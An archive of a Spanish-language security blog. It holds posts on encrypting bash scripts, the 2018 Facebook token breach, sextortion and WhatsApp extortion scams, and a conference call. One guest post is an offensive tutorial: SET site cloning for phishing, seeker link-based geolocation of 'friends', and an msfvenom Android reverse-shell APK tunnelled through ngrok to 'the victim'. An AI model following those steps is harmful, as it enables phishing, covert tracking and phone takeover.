Archive for Seguridad

OpenSSL & SHC: Cifrando un script bash, Fecha de expiración y protegiendo el acceso

En telegram específicamente en HDC preguntarón como proteger un script en bash para que nadie lo uso y solo sea usado por una persona,  por lo cual esta entrada es elaborada para que este al alcance de todo aquel que necesite proteger y cifrar sus scripts como para tener la referencia en el blog por si en algun momento lo necesito.

Hace tiempo leí de pasada sobre shc el cual cumple con la función de cifrar código en bash pasandolo por C, para contar con un binario además de adicionar algunas funcionalidades como ser tiempo de expiración y un mensaje, también se tendrá como se puede trabajar con OpenSSL para realizar el cifrado, esta mas que claro que existen caminos para hacer la inversa a estos procesos, pero ellos no serán analizados en esta entrada

Tenemos el siguiente Script, que  usaremos para realizar las pruebas el cual no cumple con lo que dice.

#!/bin/bash
# Script de inicio de Docker
echo "Iniciando script...."
echo "Datos del Sistema Operativo"
uname -a
echo "Docker Iniciado"

Generando un binario y limitando el uso a una fecha con SHC

El proceso de instalación es simple para ello pueden ver los siguientes enlaces como el repositorio en GITHUB.

Como siempre para visualizar las opciones basta con man shc y conocer mas de las funcionalidades en esta entrada unicamente veremos poner una fecha de expiración y un mensaje que mostrará, cabe resaltar que este proceso si se puede bypassear simplemente modificando la fecha.

[kvothe@Bashert]: ~/SniferL4bs>$ shc -e 07/10/2018 -m "Tiempo de uso expirado contactate con Snifer en www.sniferl4bs.com" -f sniferl4bs.sh

Las variables que usamos son las siguientes:

-e: Definimos la fecha de expiración.
-m: Mensaje que se mostrara cuando se tenga la fecha de expiración.
-f: Fichero a cifrar.
-o: Salida del binario (No lo use en este caso)

Recordamos el fichero que tenemos.

El resultado del proceso que realizamos es un fichero con la extensión .x basta con ejecutarlo como un binario.

Ahora cuando la fecha de expiración llega se muestra el mensaje, que configuramos durante el proceso de cifrado.

Cifrando y restringiendo el acceso con OpenSSL

En este otro caso hacemos uso de OpenSSL, para que el script este cifrado y además sea posible restringir el acceso unicamente a los que tenga la contraseña.

[kvothe@Bashert]: ~/SniferL4bs>$ openssl enc -e -aes-256-cbc -iter 10 -a -in sniferl4bs.sh > script-enc

Al ejecutar nos pide que agreguemos la contraseña.

Una vez realiado tenemos el fichero script-enc en este caso que es el nombre que le dimos para usarlo tenemos que usar el siguiente comando la inversa.

[kvothe@Bashert]: ~/SniferL4bs>$ openssl enc -d -aes-256-cbc -iter 10 -a -in script-enc | sh

El resultado es el siguiente:

Cipher OpenSSL: ShellHacks

“Un viaje de mil millas comienza con un solo paso” – Lao Tse.


Regards,
Snifer

Leer artículo original: OpenSSL & SHC: Cifrando un script bash, Fecha de expiración y protegiendo el acceso

Hacking con Ngrok: SET – Seeker y Metasploit fuera de LAN

Hola queridos lectores de Snifer@L4b’s, hablando un poco con mi amigo Snifer me pidio que hiciera un post para su blog, así que vamos a ellos y en esta oportunidad vamos hablar de como sacar nuestros ataques afuera de LAN haciendo uso de Ngrok.

Ox1. ¿Qué es Ngrok? 

Es una herramienta con la que podemos crear un túnel accesible a través de un dominio que nos asigna la propia aplicación, para así acceder a un servidor local. 

 Vamos a su sitio web https://ngrok.com/ y nos registramos, y descargamos su cliente.

Nota: En la versión gratuita esta url se genera cada que ejecutemos ngrok , sin embargo con la opción de pago podemos configurar subdominios permanentes y otras opciones mas avanzadas que harán mas fácil nuestro trabajo.

0x2. Instalación 

Luego de descargar nuestro cliente vamos a conectarnos a nuestra cuenta con el authtoken que se genera cuando ingresamos a nuestra cuenta.

$ ./ngrok authtoken TOKEN 

0x3. SET (social engineer toolkit) con Ngrok 

Luego de la instalación de Ngrok vamos a empezar a jugar realizando pruebas con una herramienta que ya todos conocemos para realizar ataques de ingeniería social, vamos a realizar el ejemplo más clásico que sería clonar un sitio web.

Iniciamos nuestro servicio de apache

service apache2 start

Para ello vamos a crear un tuner http con ngrok que apunte al puerto 80.

./ngrok http 80

Ahora vamos habilitar que apache2 funcione con set en el archivo local /etc/setoolkit/set.config. Buscamos la linea

 APACHE_SERVER=OFF  

y cambiamos OFF por ON, guardamos los cambios y procedemos a ejecutar setoolkit y a utilizar el módulo de Site Cloner. 
Procedemos a la configuración del módulo de la siguiente forma 

Cuando se crea el tunel genera un index.html por default, asi que se recomiendo renombrar el index2.html que contiene el sitio web clonado. 

Fuck yeah! cuando ingresamos a la url de ngrok obversvamos nuestro sitio web clonado.

0x4. Geolocalización de Dispositivos 

Continuando con nuestro post, ahora veremos seeker una herramienta escrita en python que ya incluye ngrok con la cual podemos geolocalizar dispositivos. Con esta herramienta podemos extraer la siguiente información si el visitante acepta los permisos que la plataforma web pide.
  • Longitud
  • Latitud
  • Exactitud

Sin permisos del usuario podemos obtener la siguiente información.

  • Sistema operativo
  • Plataforma
  • Número de núcleos de CPU
  • Cantidad de RAM – Resultados aproximados
  • Resolución de la pantalla
  • Información de GPU
  • Nombre y versión del navegador
  • Dirección IP pública

Instalación: 

Clonamos el repositoria de git

git clone https://github.com/thewhiteh4t/seeker.git

Ejecutamos el script de instalación

./install.sh

Una vez instalada todas las dependencias, unicamente corremos en terminal el comando python seeker.py

Ahora solo queda enviar la url generada con la herramienta a nuestros amigos…

Nota: La herraminta crea un server php en el puerto 80, así que si tienen corriendo apache2 deben detenerlo.

0x5 Metasploit con Ngrok 

Como ultimo ejemplo vamos a realizar un ataque con msfvemon, en este caso usaremos el ataque mas simple generando un backdoor y enviando a la victima. Como en el ejemplo con setoolkit vamos a crear un tunel solo que en este caso sera TCP en el cual se va apuntar al puerto 1337.

./ngrok tcp 1337

Como se observa tenemos tcp://0.tcp.ngrok.io:14422

0.tcp.ngrok.io  - Host apuntando a localhost
14422 - puerto apuntado al puerto 1337

Generando nuestro apk malicioso.14422

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=14422 R > /root/Sniferlab.apk 

Ahora pondremos a la escucha nuestro handler

y cuando la victima instale el apk malicioso…

Aporte realizado por Cesar aka. @Stuxnet

Leer artículo original: Hacking con Ngrok: SET – Seeker y Metasploit fuera de LAN

Hack a Facebook: 50 millones cuentas – lo que debes saber

El día de ayer muchos usuarios sin darse cuenta que sucedía simplemente tuvieron que ingresar nuevamente sus usuarios y contraseña porque Facebook había cerrado su sesión. ¿Pero que hubo detrás de esto?

Una Brecha de seguridad fue la la razón. Facebook forzó el cierre de sesión de mas de 90 millones de usuarios como medida de seguridad ante tal situación.

Facebook Hacked.

En un comunicado de seguridad publicado el día viernes 28 de septiembre, Facebook reveló que su equipo de seguridad había descubierto el ataque hace 3 días atrás, y que se mantienen investigando el incidente.

El hacker o grupo de hackers explotó un vulnerabilidad de día zero ( Zero Day Exploit) en la red social que permitió a los atacantes la obtener y robar las tokens de acceso secretas  (secret access tokens) de mas de 50 millones de cuentas. Por esta misma razón y como precaución el gigante de la red social realizó un reset de las “access tokens” de más de 90 millones de usuarios.


Algunos detalles de la Brecha de Seguridad.


Se explotaron 3 vulnerabilidades en Facebook en conjunto. 

El primer bug ofreció de forma incorrecta a los usuarios, la opción de subir un video dentro de ciertas publicaciones que permite a las personas desear “Feliz Cumpleaños” a sus amigos cuando acceden a la página “Ver Como / View As”.

Al mismo tiempo el segundo error se encontraba en el gestor de subida de video, el cual generó incorrectamente un token de acceso que tenia permiso para iniciar sesión en la aplicación móvil de Facebook.

Finalmente el tercer bug fue que el token generado no era para ti como espectador, sino que fue generado para el usuario al cual estabas buscando. Así los atacantes podían obtener los Tokens de los usuarios a los cuales estaban simulando gracias a la característica “Ver Como”.

Access Tokens y lo que debemos saber del Ataque.

Para comprender de que se trata y como afecta esta brecha de seguridad a los usuarios de Facebook, es que primero debemos hablar del “Access Tokens”.

Los “Access Tokens” son equivalentes a credenciales de acceso, es decir una llave digital que una vez que inicias sesión con tu usuario y contraseña, se genera esta Access Token que es el responsable de mantener en Facebook la sesión iniciada y que no sea necesario estar ingresando el usuario y contraseña cada vez que utilizas la aplicación.

Ya teniendo claro el concepto de Access Token de forma básica. En el ataque a Facebook el atacante pudo obtener 50 millones de estas llaves digitales, las cuales le permitirían obtener acceso a información sensible de cada cuenta comprometida sin necesidad de saber la contraseña de inicio de tu cuenta o saber tu código de autenticación de dos factores.


“Tu contraseña no fue revelada, con el “Access Tokens” robado, no era necesaria.

Finalmente el día de ayer, Facebook realizó un reset de alrededor de 50 millones de Access Tokens afectadas y al mismo tiempo de forma preventiva de otras 40 millones mas. Como resultado de lo anterior es que alrededor de 90 millones de usuarios tendrán que volver a iniciar su sesión en Facebook o en cualquiera de sus aplicaciones que usen el Login de Facebook. Después de haber hecho dicho inicio de sesión los usuarios recibiran una notificación en la parte superior de sus Feed News explicando lo sucedido.


Fuente tomada desde: https://newsroom.fb.com/news/2018/09/security-update/



Leer artículo original: Hack a Facebook: 50 millones cuentas – lo que debes saber

"Sextorsión" en Chile, envío de correos falsos solicitando dinero en Bitcoins

“Sextorsión”


Sextorsión o extorsión sexual es una forma de explotación sexual en la cual  una persona es chantajeada con una imagen o vídeo de si misma desnuda o realizando actos sexuales que generalmente es compartida con fines de que se haga viral. La víctima es obligada a mantener el abuso, ya sea: mantener relaciones sexuales, entregar más material erótico o pornográfico, dinero o algún otro beneficio, bajo la continua amenaza de difundir las imágenes originales sino accede al chantaje.


“Esta sucediendo en Chile”


El día de ayer se comunicaron con nuestro soporte, una empresa de abogados a los cuales prestamos servicios. El caso era que habían recibido un correo desde una de sus propias “cuentas de correo”, en el cual estaban solicitando dinero, afirmando que habían accedido por completo a los dispositivos y que por esa razón eran capaces mandar un correo desde su propia cuenta. Por otro lado, agregan que instalaron malware en cierta página de videos para adultos y explican que por haber visitado dicho sitio se infectaron del malware y ahora mediante esta infección lograron hacer registro de sus teclas -Keylogger- lo cual proporcionó acceso a su pantalla y cámara web. Además explican que obtuvieron acceso de todos sus contactos de Messenger, redes sociales y correo electrónico.

“Registro de vídeo, chantaje y Bitcoins”

Como parte de la extorsión indican que realizaron un video doble pantalla. Una parte del de esta material mostraría el video que supuestamente estabas viendo en tu pantalla ( Sitio Video para adultos) y la otra parte mostraría una captura de imagen realizada mediante la propia cámara web de la víctima. 

La víctima debe hacer un pago de $250 mediante Bitcoins (BTC)  e indican que la víctima debe buscar en google como comprar bitcoins, entregando la dirección BTC donde quieren que sea enviado el dinero con el fin de no enviar la grabación del supuesto video a todos sus contactos, compañeros de trabajo y otros.

El correo:



Análisis del Caso:

    • El hecho que el remitente de correo sea la dirección de la víctima en NINGÚN caso confirma que el atacante tenga acceso del correo. Existen formas bastante sencillas de falsear el remitente -email spoofing- .
    • Utilizan temas comunes y de uso tan frecuente por el público como el visitar páginas de adultos, para así crear un ambiente de realidad e incertidumbre hacia la víctima.
    • Utilizan términos informáticos, para confundir y establecer una posición de “conocimiento técnico” que permita obtener una posición privilegiada y superior sobre la víctima para llevar a cabo la extorsión.
    • Apelan al miedo del estigma social, sobre la navegación por sitios de adultos, aprovechando la alta probabilidad de que alguna de sus víctimas haya visitado un sitio de adultos en el último tiempo. Al mismo tiempo de verse expuesto en Internet en una grabación en torno a un momento íntimo.

  • Aclaraciones Finales:

    • Parte fundamental del ataque es mantener con temor a la víctima haciendo creer que todo lo dicho en ese correo es real y no solo parte de un engaño totalmente ficticio.
    • El atacante NO tiene acceso a tus dispositivos.
    • El atacante NO tiene acceso a tus correos, solo falseó el remitente.
    • El atacante NO tiene grabaciones de tu webcam o pantalla.
    • El atacante NO sabe si tu visitaste o no un sitio para adultos, solo juega con las probabilidades.
    • Por último, no debes pagar el dinero solicitado porque los atacantes solo están jugando con las probabilidades y tu mente. Basado en el hecho de “el que nada hace, nada teme”. 
    • Y si así fuera que visitaste un sitio de adultos e hiciste cosas por las cuales podrías sentir pudor frente a la cámara, recuerda que ellos no tienen acceso a tu equipo. Y si alguna vez sucede que por otro tipo de ataque tuvieran acceso a tu cámara web, nadie puede asegurarte que el pago de dinero logré que se detengan en cuanto a la extorsión, es mas, lo más probable es que sigan solicitando dinero sin fin.


Al cierre de esta publicación

Al cierre de esta publicación ya se han recibido 5 transacciones de dinero hacia esta dirección de Bitcoins. Lo cual explica que 5 personas han realizado el pago mediante esta técnica de engaño. El monto al cierre de esta publicación por las 5 transacciones de Bitcoins asciende a 0.13293496 Bitcoins, lo que es equivalente a 569.277 pesos chilenos


Leer artículo original: "Sextorsión" en Chile, envío de correos falsos solicitando dinero en Bitcoins

Estafa a través de WhatsApp y Facebook relacionada con "Foto de Menores" en Chile

Esta nueva metodología – Cuento del tío 2.0 – consiste en contactar usuarios mediante Facebook para luego vía WhatsApp enviar fotos de supuestas menores de edad a la víctima, posteriormente comienzan a extorsionarlos por posesión de pornografía infantil.


____________________________________________________________________________________________


Este nueva técnica esta siendo utilizada en Chile. Mediante el uso de redes sociales, específicamente Facebook y WhatsApp es que los estafadores toman contacto con sus víctimas, envían fotos de mujeres desnudas supuestamente menores de edad para luego extorsionarlos con el fin de obtener dinero.

Un estudiante universitario de 27 años realizó la denuncia tras percatarse que estaba siendo víctima de una estafa.

Según lo denunciado por el estudiante a la Policía de Investigaciones de Chile (PDI), una mujer lo habría contactado por Facebook y tras una breve conversación compartieron sus números telefónicos para continuar comunicándose por WhatsApp, donde el joven recibe fotos de índole sexual supuestamente de ella.

Posterior a eso, el joven recibe un llamado de un supuesto oficial de la PDI quien le informó que las fotografías recibidas corresponden en realidad a una menor de 14 años de edad y que el padre lo iba a denunciar, para evitar la denuncia debía realizar un depósito en una cuenta bancaria por la suma de 500.000

EL joven universitario depositó 200.000 y acudió a la Brigada de Investigación Criminal, donde confirmo lo que sospechaba: Había sido víctima de un nuevo cuento del tío.

Detienen a los Responsables

A partir de la denuncia es que la PDI logró dar con el paradero de los responsables. Se trataba de un reo de la cárcel de Valparaíso y su primo quien estaba libre con residencia en Santiago, dueño de la cuenta bancaria donde fue enviado el dinero.


Leer artículo original: Estafa a través de WhatsApp y Facebook relacionada con "Foto de Menores" en Chile

Call For Papers Patagonia Hacking, capítulo Temuco

¿Te gustaría dar una charla y compartir tu experiencia en el sur de Chile? El capítulo Temuco de Patagonia Hacking se realizará el 15 y 16 de noviembre. Las postulaciones para que envies tu investigación o charla ya se encuentran abiertas.

Patagonia Hacking es una instancia para compartir experiencias y conocimientos en relación a seguridad informática y hacking. Por primera vez, se realizará en dos ciudades de Chile. El 8 y 9 de noviembre en Punta Arenas y el 15 y 16 de noviembre en Temuco. Los speakers y talleres para el capítulo de Punta Arenas ya se encuentra completo, sin embargo, para Temuco se acaba de abrir un CFP para que puedas enviar tu investigación. El plazo es hasta el 29 de septiembre.

Temuco

Este es el anuncio oficial:

Si eres investigador/a en seguridad y quieres mostrar tu trabajo, Patagonia Hacking es una buena instancia para lograrlo.

Temáticas
• Pentesting. Ingeniería Social, Hardware Hacking.
• Seguridad en Redes, Seguridad Web, Seguridad Móviles, Seguridad en Entornos Industriales. Seguridad en la Nube, Seguridad en Tecnologías Emergentes.
• Vulnerabilidades 0-day,Exploiting.
• Criptografía, Computación Forense, Desarrollo Seguro.
• Seguridad en IoT.

Para enviar tu paper a Patagonia hacking necesitas:

• Enviar tu paper al siguiente correo contacto@patagoniasec.cl
• Plazo Máximo para recepción de papers: 29 de Septiembre de 2018
• Anuncio de papers aceptados 01 de Octubre de 2018
• En caso que su paper sea aceptado el comité académico se pondrá en contacto con Usted y le indicara los pasos a seguir

Leer artículo original: Call For Papers Patagonia Hacking, capítulo Temuco